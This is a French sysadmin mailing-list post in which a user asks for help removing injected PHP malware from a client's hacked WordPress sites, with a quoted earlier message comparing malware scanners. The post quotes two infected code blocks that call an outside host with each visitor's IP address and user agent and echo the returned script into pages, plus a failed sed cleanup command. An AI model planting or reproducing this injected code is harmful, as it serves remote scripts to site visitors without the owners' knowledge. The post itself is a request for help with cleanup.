Hello,
Je me permet de relancer la discutions car j'ai presque le même problème
avec un client.
Sauf que le code change sur presque tout les fichiers.
Voici un exemple de code :
<?php
#568ba2#
error_reporting(0); @ini_set('display_errors',0); $wp_f67188 =
@$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i',
$wp_f67188) && !preg_match ('/bot/i', $wp_f67188))){^M
$wp_f0967188="http://"."theme"."header".".com/"."header"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_f67188);^M
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch =
curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_f0967188); curl_setopt
($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);^M
$wp_67188f = curl_exec ($ch); curl_close($ch);} elseif
(function_exists('file_get_contents') && @ini_get('allow_url_fopen'))
{$wp_67188f = @file_get_contents($wp_f0967188);}^M
elseif (function_exists('fopen') &&
function_exists('stream_get_contents'))
{$wp_67188f=@stream_get_contents(@fopen($wp_f0967188, "r"));}}^M
if (substr($wp_67188f,1,3) === 'scr'){ echo $wp_67188f; }
#458ba2#
?>
Ou encore
<?php
#5a9312#
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch =
curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_f0967188); curl_setopt
($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);^M
$wp_67188f = curl_exec ($ch); curl_close($ch);} elseif
(function_exists('file_get_contents') && @ini_get('allow_url_fopen'))
{$wp_67188f = @file_get_contents($wp_f0967188);}^M
elseif (function_exists('fopen') &&
function_exists('stream_get_contents'))
{$wp_67188f=@stream_get_contents(@fopen($wp_f0967188, "r"));}}^M
if (substr($wp_67188f,1,3) === 'scr'){ echo $wp_67188f; }
#/5a9312#
?>
J'ai essayé beaucoup de sed et xargs, mais le code est trop complexe
pour arrive a faire un truc propre.
find . -type f -name "*.php" -print | xargs sed -i.hacked 's/^<?php n#*#
*?>//g'
Le seul point commun est un début <?php saute de ligne puis un # et en
fin un autre # saute de ligne ?>
J’essaie d'utiliser https://github.com/planet-work/php-malware-scanner
Mais cela ne semble mal fonctionner avec mon problème.
Auriez vous une idée ?
Merci
Pierre
Le 20/05/2015 16:09, Julien Escario a écrit :
> Le 20/05/2015 07:14, Jonathan Leroy a écrit :
>> J'ai eu une demande de "nettoyage" de sites WordPress ayant été hackés hier.
>>
>> J'en ai donc profité pour tester tous vos outils sur un des sites.
>
>> Le grand gagnant est php-malware-scanner de Frédéric, qui détecte deux
>> fichiers de plus que Sucuri (mais en laisse passer un autre).
>> J'ai mis un tableau comparatif en PJ pour ceux que ça intéresse :)
>
> Nice job !
>
> Merci du retour.
> Julien
>
>
>
> _______________________________________________
> Liste de diffusion du FRsAG
> http://www.frsag.org/
>
_______________________________________________
Liste de diffusion du FRsAG
http://www.frsag.org/
